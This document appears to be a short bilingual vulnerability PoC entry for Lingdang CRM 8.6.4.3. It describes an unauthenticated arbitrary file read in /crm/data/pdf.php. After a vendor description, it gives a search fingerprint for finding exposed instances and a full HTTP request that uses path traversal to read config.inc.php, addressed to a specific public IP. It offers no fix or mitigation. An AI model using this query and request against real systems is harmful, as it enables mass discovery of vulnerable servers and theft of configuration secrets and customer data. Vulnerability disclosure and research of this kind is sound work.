无描述...

漏洞描述

- Summary

灵当CRM是一款专为中小企业打造的智能客户关系管理工具，由上海灵当信息科技有限公司开发并运营。广泛应用于金融、教育、医疗、IT服务、房地产等多个行业领域，帮助企业实现客户个性化管理需求，提升企业竞争力。无论是新客户开拓、老客户维护，还是销售过程管理、服务管理等方面，灵当CRM都能提供全面、高效的解决方案。

- Lingdang CRM is an intelligent customer relationship management tool specifically designed for small and medium-sized enterprises. It is developed and operated by Shanghai Lingdang Information Technology Co., Ltd. It is widely used in various industries including finance, education, healthcare, IT services, and real estate. Lingdang CRM helps businesses meet their customer personalization management needs and enhances their competitiveness. Whether it's about acquiring new customers, maintaining existing ones, or managing the sales process and service management, Lingdang CRM provides comprehensive and efficient solutions.

灵当CRM 8.6.4.3 存在任意⽂件读取漏洞，漏洞发生在/crm/data/pdf.php。

- LingDang CRM versions 8.6.4.3 and earlier are affected by an arbitrary file read vulnerability, occurring at /crm/data/pdf.php. This vulnerability can be exploited without any special permissions.

资产测绘

body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")

POC

GET /crm/data/pdf.php?url=../config.inc.php HTTP/1.1
Host: 113.44.60.140
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (K
HTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,im
age/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close